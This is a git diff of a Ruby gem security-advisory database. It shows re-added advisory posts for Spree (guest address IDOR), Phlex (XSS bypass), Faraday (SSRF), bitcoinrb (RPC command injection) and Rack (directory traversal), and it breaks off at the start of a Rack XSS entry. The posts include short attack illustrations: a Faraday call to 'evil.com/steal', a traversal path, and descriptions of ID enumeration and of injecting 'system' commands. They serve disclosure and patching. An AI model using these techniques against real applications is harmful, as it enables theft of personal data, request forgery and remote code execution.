-  description: |
-    ### Summary
-
-    A critical IDOR vulnerability exists in Spree Commerce's guest
-    checkout flow that allows any guest user to bind arbitrary guest
-    addresses to their order by manipulating address ID parameters.
-    This enables unauthorized access to other guests' personally
-    identifiable information (PII) including names, addresses and
-    phone numbers. The vulnerability bypasses existing ownership
-    validation checks and affects all guest checkout transactions.
-
-    ### Impact
-
-    This issue may lead to disclosure of PII of guest users
-    (including names, addresses and phone numbers).
-
-    ### Unauthenticated users can access all guest addresses (`GHSL-2026-027`)
-
-    The vulnerability stems from incomplete authorization validation
-    in Spree's checkout address assignment logic. While nested address
-    attributes (`bill_address_attributes[id]` and
-    `ship_address_attributes[id]`) are properly validated through
-    `validate_address_ownership`, plain ID parameters (`bill_address_id`
-    and `ship_address_id`) bypass this check entirely. Since Spree's
-    address IDs are sequential numbers, an attacker might get all
-    guest addresses by simply enumerating over them.
-
-    ### Affected Code Components
-
-    1. **Permitted Attributes** ([`core/lib/spree/permitted_attributes.rb:92–96`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/lib/spree/permitted_attributes.rb#L92-L96))
-       - Allows `bill_address_id` and `ship_address_id` as permitted
-         parameters without validation
-
-    2. **Checkout Update** ([`core/app/models/spree/order/checkout.rb:241–254`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/checkout.rb#L241-L254))
-       - Applies permitted parameters directly to the Order model
-         via `update_from_params`
-
-    3. **Incomplete Ownership Validation** ([`core/app/services/spree/checkout/update.rb:33–48`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/services/spree/checkout/update.rb#L33-L48))
-       - `validate_address_ownership` only validates nested attributes structure
-       - Does NOT validate plain `bill_address_id`/`ship_address_id` fields
-
-    4. **Vulnerable Assignment Logic** ([`core/app/models/spree/order/address_book.rb:16–23, 31–38`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L16-L38))
-       * [`bill_address_id=` setter](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L16-L24)
-       * [`ship_address_id=` setter](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L31-L39)
-
-    Both setters check that: `address.user_id == order.user_id`. For
-    guest orders: nil == nil → TRUE ✓ (bypass!)
-
-    #### Impact
-
-    This issue may lead to disclosure of PII of guest users
-    (including names, addresses and phone numbers).
-
-    #### CWEs
-
-    - CWE-639: Authorization Bypass Through User-Controlled Key
-    - CWE-284: Improper Access Control
-
-    ### Credit
-
-    This issue was discovered with the [GitHub Security Lab Taskflow Agent](https://github.com/GitHubSecurityLab/seclab-taskflow-agent)
-    and manually verified by GHSL team members
-    [@p- (Peter Stöckli)](https://github.com/p-) and
-    [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).
-
-    ### Disclosure Policy
-
-    This report is subject to a 90-day disclosure deadline, as
-    described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
-  cvss_v4: 7.7
-  patched_versions:
-  - "~> 4.10.3"
-  - "~> 5.0.8"
-  - "~> 5.1.10"
-  - "~> 5.2.7"
-  - ">= 5.3.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-25758
-    - https://github.com/spree/spree/security/advisories/GHSA-87fh-rc96-6fr6
-    - https://github.com/spree/spree/commit/15619618e43b367617ec8d2d4aafc5e54fa7b734
-    - https://github.com/spree/spree/commit/29282d1565ba4f7bc2bbc47d550e2c0c6d0ae59f
-    - https://github.com/spree/spree/commit/6650f96356faa0d16c05bcb516f1ffd5641741b8
-    - https://github.com/spree/spree/commit/902d301ac83fd2047db1b9a3a99545162860f748
-    - https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054
-    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L16-L38
-    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/checkout.rb#L241-L254
-    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/services/spree/checkout/update.rb#L33-L48
-    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/lib/spree/permitted_attributes.rb#L92-L96
-    - https://advisories.gitlab.com/pkg/gem/spree_api/CVE-2026-25758
-    - https://github.com/advisories/GHSA-87fh-rc96-6fr6
----
+---
+layout: advisory
+title: 'CVE-2026-25758 (spree_api): Unauthenticated Spree Commerce users can access
+  all guest addresses'
+comments: false
+categories:
+- spree_api
+advisory:
+  gem: spree_api
+  cve: 2026-25758
+  ghsa: 87fh-rc96-6fr6
+  url: https://github.com/spree/spree/security/advisories/GHSA-87fh-rc96-6fr6
+  title: Unauthenticated Spree Commerce users can access all guest addresses
+  date: 2026-02-05
+  description: |
+    ### Summary
+
+    A critical IDOR vulnerability exists in Spree Commerce's guest
+    checkout flow that allows any guest user to bind arbitrary guest
+    addresses to their order by manipulating address ID parameters.
+    This enables unauthorized access to other guests' personally
+    identifiable information (PII) including names, addresses and
+    phone numbers. The vulnerability bypasses existing ownership
+    validation checks and affects all guest checkout transactions.
+
+    ### Impact
+
+    This issue may lead to disclosure of PII of guest users
+    (including names, addresses and phone numbers).
+
+    ### Unauthenticated users can access all guest addresses (`GHSL-2026-027`)
+
+    The vulnerability stems from incomplete authorization validation
+    in Spree's checkout address assignment logic. While nested address
+    attributes (`bill_address_attributes[id]` and
+    `ship_address_attributes[id]`) are properly validated through
+    `validate_address_ownership`, plain ID parameters (`bill_address_id`
+    and `ship_address_id`) bypass this check entirely. Since Spree's
+    address IDs are sequential numbers, an attacker might get all
+    guest addresses by simply enumerating over them.
+
+    ### Affected Code Components
+
+    1. **Permitted Attributes** ([`core/lib/spree/permitted_attributes.rb:92–96`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/lib/spree/permitted_attributes.rb#L92-L96))
+       - Allows `bill_address_id` and `ship_address_id` as permitted
+         parameters without validation
+
+    2. **Checkout Update** ([`core/app/models/spree/order/checkout.rb:241–254`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/checkout.rb#L241-L254))
+       - Applies permitted parameters directly to the Order model
+         via `update_from_params`
+
+    3. **Incomplete Ownership Validation** ([`core/app/services/spree/checkout/update.rb:33–48`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/services/spree/checkout/update.rb#L33-L48))
+       - `validate_address_ownership` only validates nested attributes structure
+       - Does NOT validate plain `bill_address_id`/`ship_address_id` fields
+
+    4. **Vulnerable Assignment Logic** ([`core/app/models/spree/order/address_book.rb:16–23, 31–38`](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L16-L38))
+       * [`bill_address_id=` setter](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L16-L24)
+       * [`ship_address_id=` setter](https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L31-L39)
+
+    Both setters check that: `address.user_id == order.user_id`. For
+    guest orders: nil == nil → TRUE ✓ (bypass!)
+
+    #### Impact
+
+    This issue may lead to disclosure of PII of guest users
+    (including names, addresses and phone numbers).
+
+    #### CWEs
+
+    - CWE-639: Authorization Bypass Through User-Controlled Key
+    - CWE-284: Improper Access Control
+
+    ### Credit
+
+    This issue was discovered with the [GitHub Security Lab Taskflow Agent](https://github.com/GitHubSecurityLab/seclab-taskflow-agent)
+    and manually verified by GHSL team members
+    [@p- (Peter Stöckli)](https://github.com/p-) and
+    [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).
+
+    ### Disclosure Policy
+
+    This report is subject to a 90-day disclosure deadline, as
+    described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
+  cvss_v4: 7.7
+  patched_versions:
+  - "~> 4.10.3"
+  - "~> 5.0.8"
+  - "~> 5.1.10"
+  - "~> 5.2.7"
+  - ">= 5.3.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25758
+    - https://github.com/spree/spree/security/advisories/GHSA-87fh-rc96-6fr6
+    - https://github.com/spree/spree/commit/15619618e43b367617ec8d2d4aafc5e54fa7b734
+    - https://github.com/spree/spree/commit/29282d1565ba4f7bc2bbc47d550e2c0c6d0ae59f
+    - https://github.com/spree/spree/commit/6650f96356faa0d16c05bcb516f1ffd5641741b8
+    - https://github.com/spree/spree/commit/902d301ac83fd2047db1b9a3a99545162860f748
+    - https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054
+    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/address_book.rb#L16-L38
+    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/models/spree/order/checkout.rb#L241-L254
+    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/app/services/spree/checkout/update.rb#L33-L48
+    - https://github.com/spree/spree/blob/1341623f2ae92685cdbe232885bf5808fc8f9ca8/core/lib/spree/permitted_attributes.rb#L92-L96
+    - https://advisories.gitlab.com/pkg/gem/spree_api/CVE-2026-25758
+    - https://github.com/advisories/GHSA-87fh-rc96-6fr6
+---
diff --git a/advisories/_posts/2026-02-06-GHSA-w67g-2h6v-vjgq.md b/advisories/_posts/2026-02-06-GHSA-w67g-2h6v-vjgq.md
index 34caf8fa..d1b766d6 100644
--- a/advisories/_posts/2026-02-06-GHSA-w67g-2h6v-vjgq.md
+++ b/advisories/_posts/2026-02-06-GHSA-w67g-2h6v-vjgq.md
@@ -1,72 +1,72 @@
----
-layout: advisory
-title: 'GHSA-w67g-2h6v-vjgq (phlex): Phlex XSS protection bypass via attribute splatting,
-  dynamic tags, and href values'
-comments: false
-categories:
-- phlex
-advisory:
-  gem: phlex
-  ghsa: w67g-2h6v-vjgq
-  url: https://github.com/yippee-fun/phlex/security/advisories/GHSA-w67g-2h6v-vjgq
-  title: Phlex XSS protection bypass via attribute splatting, dynamic tags, and href
-    values
-  date: 2026-02-06
-  description: |
-    ### Impact
-
-    During a security audit conducted with Claude Opus 4.6 and GPT-5.3-Codex,
-    we identified three specific ways to bypass the XSS (cross-site-scripting)
-    protection built into Phlex.
-
-    1. The first bypass could happen if user-provided attributes with
-       string keys were splatted into HTML tag, e.g. `div(**user_attributes)`.
-
-    2. The second bypass could happen if user-provided tag names were
-       passed to the `tag` method, e.g. `tag(some_tag_name_from_user)`.
-
-    3. The third bypass could happen if user’s links were passed to
-       `href` attributes, e.g. `a(href: user_provided_link)`.
-
-    All three of these patterns are meant to be safe and all
-    have now been patched.
-
-    ### Patches
-
-    Phlex has patched all three issues and introduced new tests that
-    run against Safari, Firefox and Chrome.
-
-    The patched versions are:
-
-    - [2.4.1](https://rubygems.org/gems/phlex/versions/2.4.1)
-    - [2.3.2](https://rubygems.org/gems/phlex/versions/2.3.2)
-    - [2.2.2](https://rubygems.org/gems/phlex/versions/2.2.2)
-    - [2.1.3](https://rubygems.org/gems/phlex/versions/2.1.3)
-    - [2.0.2](https://rubygems.org/gems/phlex/versions/2.0.3)
-    - [1.11.1](https://rubygems.org/gems/phlex/versions/1.11.1)
-
-    Phlex has also patched the [`main`](https://github.com/yippee-fun/phlex)
-    branch in GitHub.
-
-    ### Workarounds
-    If a project uses a secure CSP (content security policy) or if the
-    application doesn’t use any of the above patterns, it is not at risk.
-  cvss_v3: 7.1
-  patched_versions:
-  - "~> 1.11.1"
-  - "~> 2.0.2"
-  - "~> 2.1.3"
-  - "~> 2.2.2"
-  - "~> 2.3.2"
-  - ">= 2.4.1"
-  related:
-    url:
-    - https://github.com/yippee-fun/phlex/security/advisories/GHSA-w67g-2h6v-vjgq
-    - https://github.com/yippee-fun/phlex/commit/1d85da417cb15eb8cb2f54a68d531c9b35d9d03a
-    - https://github.com/yippee-fun/phlex/commit/556441d5a64ff93f749e8116a05b2d97264468ee
-    - https://github.com/yippee-fun/phlex/commit/74e3d8610ffabc2cf5f241945e9df4b14dceb97d
-    - https://github.com/yippee-fun/phlex/commit/9f56ad13bea9a7d6117fdfd510446c890709eeac
-    - https://github.com/yippee-fun/phlex/commit/fe9ea708672f9fa42526d9b47e1cdc4634860ef1
-    - https://advisories.gitlab.com/pkg/gem/phlex/GHSA-w67g-2h6v-vjgq
-    - https://github.com/advisories/GHSA-w67g-2h6v-vjgq
----
+---
+layout: advisory
+title: 'GHSA-w67g-2h6v-vjgq (phlex): Phlex XSS protection bypass via attribute splatting,
+  dynamic tags, and href values'
+comments: false
+categories:
+- phlex
+advisory:
+  gem: phlex
+  ghsa: w67g-2h6v-vjgq
+  url: https://github.com/yippee-fun/phlex/security/advisories/GHSA-w67g-2h6v-vjgq
+  title: Phlex XSS protection bypass via attribute splatting, dynamic tags, and href
+    values
+  date: 2026-02-06
+  description: |
+    ### Impact
+
+    During a security audit conducted with Claude Opus 4.6 and GPT-5.3-Codex,
+    we identified three specific ways to bypass the XSS (cross-site-scripting)
+    protection built into Phlex.
+
+    1. The first bypass could happen if user-provided attributes with
+       string keys were splatted into HTML tag, e.g. `div(**user_attributes)`.
+
+    2. The second bypass could happen if user-provided tag names were
+       passed to the `tag` method, e.g. `tag(some_tag_name_from_user)`.
+
+    3. The third bypass could happen if user’s links were passed to
+       `href` attributes, e.g. `a(href: user_provided_link)`.
+
+    All three of these patterns are meant to be safe and all
+    have now been patched.
+
+    ### Patches
+
+    Phlex has patched all three issues and introduced new tests that
+    run against Safari, Firefox and Chrome.
+
+    The patched versions are:
+
+    - [2.4.1](https://rubygems.org/gems/phlex/versions/2.4.1)
+    - [2.3.2](https://rubygems.org/gems/phlex/versions/2.3.2)
+    - [2.2.2](https://rubygems.org/gems/phlex/versions/2.2.2)
+    - [2.1.3](https://rubygems.org/gems/phlex/versions/2.1.3)
+    - [2.0.2](https://rubygems.org/gems/phlex/versions/2.0.3)
+    - [1.11.1](https://rubygems.org/gems/phlex/versions/1.11.1)
+
+    Phlex has also patched the [`main`](https://github.com/yippee-fun/phlex)
+    branch in GitHub.
+
+    ### Workarounds
+    If a project uses a secure CSP (content security policy) or if the
+    application doesn’t use any of the above patterns, it is not at risk.
+  cvss_v3: 7.1
+  patched_versions:
+  - "~> 1.11.1"
+  - "~> 2.0.2"
+  - "~> 2.1.3"
+  - "~> 2.2.2"
+  - "~> 2.3.2"
+  - ">= 2.4.1"
+  related:
+    url:
+    - https://github.com/yippee-fun/phlex/security/advisories/GHSA-w67g-2h6v-vjgq
+    - https://github.com/yippee-fun/phlex/commit/1d85da417cb15eb8cb2f54a68d531c9b35d9d03a
+    - https://github.com/yippee-fun/phlex/commit/556441d5a64ff93f749e8116a05b2d97264468ee
+    - https://github.com/yippee-fun/phlex/commit/74e3d8610ffabc2cf5f241945e9df4b14dceb97d
+    - https://github.com/yippee-fun/phlex/commit/9f56ad13bea9a7d6117fdfd510446c890709eeac
+    - https://github.com/yippee-fun/phlex/commit/fe9ea708672f9fa42526d9b47e1cdc4634860ef1
+    - https://advisories.gitlab.com/pkg/gem/phlex/GHSA-w67g-2h6v-vjgq
+    - https://github.com/advisories/GHSA-w67g-2h6v-vjgq
+---
diff --git a/advisories/_posts/2026-02-09-CVE-2026-25765.md b/advisories/_posts/2026-02-09-CVE-2026-25765.md
index e52d6223..4702923a 100644
--- a/advisories/_posts/2026-02-09-CVE-2026-25765.md
+++ b/advisories/_posts/2026-02-09-CVE-2026-25765.md
@@ -1,85 +1,85 @@
----
-layout: advisory
-title: 'CVE-2026-25765 (faraday): Faraday affected by SSRF via protocol-relative URL
-  host override in build_exclusive_url'
-comments: false
-categories:
-- faraday
-advisory:
-  gem: faraday
-  cve: 2026-25765
-  ghsa: 33mh-2634-fwr2
-  url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
-  title: Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url
-  date: 2026-02-09
-  description: |
-    ### Impact
-
-    Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)
-    uses Ruby's `URI#merge` to combine the connection's base URL with
-    a user-supplied path. Per RFC 3986, protocol-relative URLs
-    (e.g. `//evil.com/path`) are treated as network-path references
-    that override the base URL's host/authority component.
-
-    This means that if any application passes user-controlled input to
-    Faraday's `get()`, `post()`, `build_url()`, or other request
-    methods, an attacker can supply a protocol-relative URL like
-    `//attacker.com/endpoint` to redirect the request to an
-    arbitrary host, enabling Server-Side Request Forgery (SSRF).
-
-    The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts
-    URLs starting with `/`, so protocol-relative URLs bypass it entirely.
-
-    **Example**
-    ```ruby
-    conn = Faraday.new(url: 'https://api.internal.com')
-    conn.get('//evil.com/steal')
-    # Request is sent to https://evil.com/steal instead of api.internal.com
-    ```
-
-    ### Patches
-
-    Faraday v2.14.1 is patched against this security issue. All
-    versions of Faraday up to 2.14.0 are affected.
-
-    ### Workarounds
-
-    **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action
-    to mitigate this issue, however should that not be an option
-    please continue reading.**
-
-    Applications should validate and sanitize any user-controlled
-    input before passing it to Faraday request methods.
-    Specifically:
-
-    - Reject or strip input that starts with // followed by a
-      non-/ character.
-    - Use an allowlist of permitted path prefixes.
-    - Alternatively, prepend ./ to all user-supplied paths before
-      passing them to Faraday.
-
-    Example validation:
-    ```ruby
-    def safe_path(user_input)
-      raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]})
-       user_input
-    end
-    ```
-  cvss_v3: 5.8
-  patched_versions:
-  - "~> 1.10.5"
-  - ">= 2.14.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-25765
-    - https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
-    - https://github.com/lostisland/faraday/releases/tag/v2.14.1
-    - https://github.com/lostisland/faraday/releases/tag/v1.10.5
-    - https://github.com/lostisland/faraday/pull/1569
-    - https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc
-    - https://github.com/lostisland/faraday/commit/d0fc049beb0b0e4e3bd4a52711189130bba7c5f4
-    - https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2
-    - https://www.rfc-editor.org/rfc/rfc3986#section-5.4
-    - https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765
-    - https://github.com/advisories/GHSA-33mh-2634-fwr2
----
+---
+layout: advisory
+title: 'CVE-2026-25765 (faraday): Faraday affected by SSRF via protocol-relative URL
+  host override in build_exclusive_url'
+comments: false
+categories:
+- faraday
+advisory:
+  gem: faraday
+  cve: 2026-25765
+  ghsa: 33mh-2634-fwr2
+  url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
+  title: Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url
+  date: 2026-02-09
+  description: |
+    ### Impact
+
+    Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)
+    uses Ruby's `URI#merge` to combine the connection's base URL with
+    a user-supplied path. Per RFC 3986, protocol-relative URLs
+    (e.g. `//evil.com/path`) are treated as network-path references
+    that override the base URL's host/authority component.
+
+    This means that if any application passes user-controlled input to
+    Faraday's `get()`, `post()`, `build_url()`, or other request
+    methods, an attacker can supply a protocol-relative URL like
+    `//attacker.com/endpoint` to redirect the request to an
+    arbitrary host, enabling Server-Side Request Forgery (SSRF).
+
+    The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts
+    URLs starting with `/`, so protocol-relative URLs bypass it entirely.
+
+    **Example**
+    ```ruby
+    conn = Faraday.new(url: 'https://api.internal.com')
+    conn.get('//evil.com/steal')
+    # Request is sent to https://evil.com/steal instead of api.internal.com
+    ```
+
+    ### Patches
+
+    Faraday v2.14.1 is patched against this security issue. All
+    versions of Faraday up to 2.14.0 are affected.
+
+    ### Workarounds
+
+    **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action
+    to mitigate this issue, however should that not be an option
+    please continue reading.**
+
+    Applications should validate and sanitize any user-controlled
+    input before passing it to Faraday request methods.
+    Specifically:
+
+    - Reject or strip input that starts with // followed by a
+      non-/ character.
+    - Use an allowlist of permitted path prefixes.
+    - Alternatively, prepend ./ to all user-supplied paths before
+      passing them to Faraday.
+
+    Example validation:
+    ```ruby
+    def safe_path(user_input)
+      raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]})
+       user_input
+    end
+    ```
+  cvss_v3: 5.8
+  patched_versions:
+  - "~> 1.10.5"
+  - ">= 2.14.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25765
+    - https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
+    - https://github.com/lostisland/faraday/releases/tag/v2.14.1
+    - https://github.com/lostisland/faraday/releases/tag/v1.10.5
+    - https://github.com/lostisland/faraday/pull/1569
+    - https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc
+    - https://github.com/lostisland/faraday/commit/d0fc049beb0b0e4e3bd4a52711189130bba7c5f4
+    - https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2
+    - https://www.rfc-editor.org/rfc/rfc3986#section-5.4
+    - https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765
+    - https://github.com/advisories/GHSA-33mh-2634-fwr2
+---
diff --git a/advisories/_posts/2026-02-10-GHSA-q66h-m87m-j2q6.md b/advisories/_posts/2026-02-10-GHSA-q66h-m87m-j2q6.md
index 435ac96f..a941fcc8 100644
--- a/advisories/_posts/2026-02-10-GHSA-q66h-m87m-j2q6.md
+++ b/advisories/_posts/2026-02-10-GHSA-q66h-m87m-j2q6.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'GHSA-q66h-m87m-j2q6 (bitcoinrb): Bitcoinrb Vulnerable to Command injection
-  via RPC'
-comments: false
-categories:
-- bitcoinrb
-advisory:
-  gem: bitcoinrb
-  ghsa: q66h-m87m-j2q6
-  url: https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
-  title: Bitcoinrb Vulnerable to Command injection via RPC
-  date: 2026-02-10
-  description: |
-    ### Summary: Remote Code Execution
-
-    Unsafe handling of request parameters in the RPC HTTP server
-    results in command injection.
-
-    ### Details
-
-    In lib/bitcoin/rpc/http_server.rb line 30-39, the JSON body of a
-    POST request is parsed into `command` and `args` variables. These
-    values are then passed to `send`, which is used to call an arbitrary
-    class method. However, there is no validation that the provided
-    `command` value  is one of the expected RPC methods.
-    This means that an attacker could supply a `command` value such
-    as `system`, and then pass arbitrary system commands into the
-    `args` parameter and achieve remote code execution.
-
-    ### Remediation
-
-     **Mitigating Factors:**
-
-    - The RPC server is part of the experimental SPV node feature,
-       which is not documented and has very few users.
-    - The SPV-related features may be removed in future releases.
-
-    **Resolution:**
-
-    - Added whitelist validation to allow only RPC methods defined
-      in `RequestHandler`.
-
-    - Fixed in version 1.12.0.
-  patched_versions:
-  - ">= 1.12.0"
-  related:
-    url:
-    - https://github.com/chaintope/bitcoinrb/releases/tag/v1.12.0
-    - https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
-    - https://github.com/chaintope/bitcoinrb/commit/070327133a2a3e5a6d265b2d82f06f9414c01e74
-    - https://github.com/advisories/GHSA-q66h-m87m-j2q6
----
+---
+layout: advisory
+title: 'GHSA-q66h-m87m-j2q6 (bitcoinrb): Bitcoinrb Vulnerable to Command injection
+  via RPC'
+comments: false
+categories:
+- bitcoinrb
+advisory:
+  gem: bitcoinrb
+  ghsa: q66h-m87m-j2q6
+  url: https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
+  title: Bitcoinrb Vulnerable to Command injection via RPC
+  date: 2026-02-10
+  description: |
+    ### Summary: Remote Code Execution
+
+    Unsafe handling of request parameters in the RPC HTTP server
+    results in command injection.
+
+    ### Details
+
+    In lib/bitcoin/rpc/http_server.rb line 30-39, the JSON body of a
+    POST request is parsed into `command` and `args` variables. These
+    values are then passed to `send`, which is used to call an arbitrary
+    class method. However, there is no validation that the provided
+    `command` value  is one of the expected RPC methods.
+    This means that an attacker could supply a `command` value such
+    as `system`, and then pass arbitrary system commands into the
+    `args` parameter and achieve remote code execution.
+
+    ### Remediation
+
+     **Mitigating Factors:**
+
+    - The RPC server is part of the experimental SPV node feature,
+       which is not documented and has very few users.
+    - The SPV-related features may be removed in future releases.
+
+    **Resolution:**
+
+    - Added whitelist validation to allow only RPC methods defined
+      in `RequestHandler`.
+
+    - Fixed in version 1.12.0.
+  patched_versions:
+  - ">= 1.12.0"
+  related:
+    url:
+    - https://github.com/chaintope/bitcoinrb/releases/tag/v1.12.0
+    - https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
+    - https://github.com/chaintope/bitcoinrb/commit/070327133a2a3e5a6d265b2d82f06f9414c01e74
+    - https://github.com/advisories/GHSA-q66h-m87m-j2q6
+---
diff --git a/advisories/_posts/2026-02-17-CVE-2026-22860.md b/advisories/_posts/2026-02-17-CVE-2026-22860.md
index ce6f6421..f3e39ee5 100644
--- a/advisories/_posts/2026-02-17-CVE-2026-22860.md
+++ b/advisories/_posts/2026-02-17-CVE-2026-22860.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2026-22860 (rack): Rack has a Directory Traversal via Rack:Directory'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2026-22860
-  ghsa: mxw3-3hh2-x2mh
-  url: https://github.com/rack/rack/security/advisories/GHSA-mxw3-3hh2-x2mh
-  title: Rack has a Directory Traversal via Rack:Directory
-  date: 2026-02-17
-  description: |-
-    ## Summary
-
-    `Rack::Directory`’s path check used a string prefix match
-    on the expanded path. A request like `/../root_example/` can escape the configured
-    root if the target path starts with the root string, allowing directory listing
-    outside the intended root.
-
-    ## Details
-
-    In `directory.rb`, `File.expand_path(File.join(root,
-    path_info)).start_with?(root)` does not enforce a path boundary. If the server root
-    is `/var/www/root`, a path like `/var/www/root_backup` passes the check because
-    it shares the same prefix, so `Rack::Directory` will list that directory also.
-
-    ## Impact
-
-    Information disclosure via directory listing outside the configured root
-    when `Rack::Directory` is exposed to untrusted clients and a directory shares the
-    root prefix (e.g., `public2`, `www_backup`).
-
-    ## Mitigation
-
-    * Update to a patched
-    version of Rack that correctly checks the root prefix.\n* Don't name directories
-    with the same prefix as one which is exposed via `Rack::Directory`."
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.2.22"
-  - "~> 3.1.20"
-  - ">= 3.2.5"
-  related:
-    url:
-    - https://github.com/rack/rack/security/advisories/GHSA-mxw3-3hh2-x2mh
-    - https://github.com/rack/rack/commit/75c5745c286637a8f049a33790c71237762069e7
-    - https://github.com/advisories/GHSA-mxw3-3hh2-x2mh
----
+---
+layout: advisory
+title: 'CVE-2026-22860 (rack): Rack has a Directory Traversal via Rack:Directory'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2026-22860
+  ghsa: mxw3-3hh2-x2mh
+  url: https://github.com/rack/rack/security/advisories/GHSA-mxw3-3hh2-x2mh
+  title: Rack has a Directory Traversal via Rack:Directory
+  date: 2026-02-17
+  description: |-
+    ## Summary
+
+    `Rack::Directory`’s path check used a string prefix match
+    on the expanded path. A request like `/../root_example/` can escape the configured
+    root if the target path starts with the root string, allowing directory listing
+    outside the intended root.
+
+    ## Details
+
+    In `directory.rb`, `File.expand_path(File.join(root,
+    path_info)).start_with?(root)` does not enforce a path boundary. If the server root
+    is `/var/www/root`, a path like `/var/www/root_backup` passes the check because
+    it shares the same prefix, so `Rack::Directory` will list that directory also.
+
+    ## Impact
+
+    Information disclosure via directory listing outside the configured root
+    when `Rack::Directory` is exposed to untrusted clients and a directory shares the
+    root prefix (e.g., `public2`, `www_backup`).
+
+    ## Mitigation
+
+    * Update to a patched
+    version of Rack that correctly checks the root prefix.\n* Don't name directories
+    with the same prefix as one which is exposed via `Rack::Directory`."
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.2.22"
+  - "~> 3.1.20"
+  - ">= 3.2.5"
+  related:
+    url:
+    - https://github.com/rack/rack/security/advisories/GHSA-mxw3-3hh2-x2mh
+    - https://github.com/rack/rack/commit/75c5745c286637a8f049a33790c71237762069e7
+    - https://github.com/advisories/GHSA-mxw3-3hh2-x2mh
+---
diff --git a/advisories/_posts/2026-02-17-CVE-2026-25500.md b/advisories/_posts/2026-02-17-CVE-2026-25500.md
index c09f118b..47aed7b6 100644
--- a/advisories/_posts/2026-02-17-CVE-2026-25500.md
+++ b/advisories/_posts/2026-02-17-CVE-2026-25500.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2026-25500 (rack): Stored XSS in Rack::Directory via javascript: filenames
-  rendered into anchor href'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2026-25500
-  ghsa: whrj-4476-wvmp
-  url: https://github.com/rack/rack/security/advisories/GHSA-whrj-4476-wvmp
-  title: 'Stored XSS in Rack::Directory via javascript: filenames rendered into anchor
-    href'
-  date: 2026-02-17
-  description: |-
-    ## Summary
-
